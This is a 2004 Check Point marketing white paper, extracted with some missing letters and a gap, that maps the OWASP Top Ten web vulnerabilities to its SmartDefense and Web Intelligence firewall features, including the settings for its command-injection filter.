Beruflich Dokumente
Kultur Dokumente
Mitigating the OWASP Ten Most Critical Web Application Security Problems with Check Point Solutions
In This Document Introduction 2 The Top 10 Web Application Vulnerabilities and Their Remedies 1: Unvalidated Input 3 2: Broken Access Control 4 3: Broken Account and Session Management 5 4: Cross-site scripting (XSS) Flaws 5 5: Buffer Overows 6 6: Injection Flaws 6 7: Improper Error Handling 7 8: Insecure Storage 8 9: Denial of Service 9 10: Insecure Conguration Management 9
Introduction
IT security managers face constantly changing and increasingly more sophisticated challenges. For instance, at one time their concern over Internet security was focused primarily on perimeter network security. But Internet security has long since grown beyond the network perimeter. Fundamental Internet services (email, FTP, HTTP, and Telnet) have been eclipsed by a plethora of dynamic Web applications, servers, and databases that are available 24x7. These represent the infrastructure of the digital economy, making them a very attractive target for hackers. Having grown beyond the network layer, Internet security now encompasses distinct requirements for perimeter, internal, and Web application security. As Web applications become increasingly prevalent, so do the security risks and requirements for comprehensive Web security solutions. The Open Web Application Security Project (OWASP), a group dedicated to helping organizations recognize the security challenges intrinsic to Web applications and Web services, has documented these challenges. The OWASP Ten Most Critical Web Application Security Vulnerabilities: 2004 Update lists vulnerabilities of which every network security manager should be aware. (The document is available at http://www.owasp.org/ documentation/topten.) The OWASP Top Ten identies vulnerabilities, or security aws, to which the majority of successful Internet-based attacks can be traced. The list focuses on vulnerabilities at the code level of applications. Usually, mitigation of such a wide range of vulnerabilities would require the deployment of multiple tools and techniques, often based on different technologies. This paper outlines how to approach each of the OWASP Top Ten Web application vulnerabilities using Check Point intelligent solutions for perimeter, internal, and Web security. An important aspect of the Check Point approach is the ability to offer security without losing connectivity, because blocking an essential service to protect against a specic attack is rarely an acceptable solution. The methods described focus primarily on how Check Point SmartDefensecentralized point of control against attacksand Web Intelligencea Web application rewall technologycan efciently and powerfully secure Web applications, before an attack can occur. Web Intelligence enables customers to congure, enforce, and update attack protections for Web servers and applications. Web Intelligence protections are designed specically for Web-based attacks and compliment the network and application level protections offered by SmartDefense. In addition, information and new attack defenses for Web Intelligence are provided online as part of Check Points SmartDefense Service. Web Intelligence protects against a range of known attacks, from attacks on the Web server itself to attacks on databases used by Web applications. In addition, Web Intelligence incorporates intelligent security technologies that protect against entire categories of emerging or unknown attacks. Web Intelligence features Check Points Malicious Code Protector, Streaming Technologies, and Application Intelligence technologies.
At the HIGH security level setting, requests are blocked when any type of quotes is used in the request. Quotes are usually used to break out of the scope of string concatenation. The MEDIUM level setting is to reject all HTTP requests that contain operating system commands that are distinctive to command injection or non-distinctive words that are found within quotes. The LOW level setting rejects all HTTP requests that contain distinctive operating system commands. Command injection protection has other useful features. Support for multiple requests in the same connection Support during GET & POST form submission Logging of attack attempts Ability to set different congurations for each Web server
CHECK POINT OFFICES: International Headquarters: 3A Jabotinsky Street, 24th Floor Ramat Gan 52520, Israel Tel: 972-3-753 4555 Fax: 972-3-575 9256 e-mail: info@CheckPoint.com U.S. Headquarters: 800 Bridge Parkway Redwood City, CA 94065 Tel: 800-429-4391 ; 650-628-2000 Fax: 650-654-4233 URL: http://www.checkpoint.com
2004 Check Point Software Technologies Ltd. All rights reserved. Check Point, Application Intelligence, Check Point Express, the Check Point logo, ClusterXL, ConnectControl, Connectra, CoSa, Cooperative Security Alliance, FireWall-1, FireWall-1 GX, FireWall-1 SecureServer, FloodGate-1, Hacker ID, INSPECT, INSPECT XL, InterSpect, IQ Engine, Open Security Extension, OPSEC, Provider-1, Safe@Home, Safe@Ofce, SecureClient, SecureKnowledge, SecurePlatform, SecurRemote, SecurServer, SecureUpdate, SecureXL, SiteManager-1, SmartCenter, SmartCenter Pro, SmartDashboard, SmartDefense, SmartLSM, SmartMap, SmartUpdate, SmartView, SmartView Monitor, SmartView Reporter, SmartView Status, SmartViewTracker, SofaWare, SSL Network Extender, UAM, User-to-Address Mapping, UserAuthority, VPN-1, VPN-1 Accelerator Card, VPN-1 Edge, VPN-1 Pro, VPN-1 SecureClient, VPN-1 SecuRemote, VPN-1 SecureServer, VPN-1 VSX, Web Intelligence, TrueVector, ZoneAlarm, Zone Alarm Pro, Zone Labs, the Zone Labs logo, AlertAdvisor, Cooperative Enforcement, IMsecure, Policy Lifecycle Management, Zone Labs Integrity and Smarter Security are trade-marks or registered trademarks of Check Point Software Technologies Ltd. or its afliates. All other product names mentioned herein are trademarks or registered trademarks of their respective owners. The products described in this document are protected by U.S. Patent No. 5,606,668, 5,835,726 and 6,496,935 and may be protected by other U.S. Patents, foreign patents, or pending applications. June XX, 2004 PN: 000000
10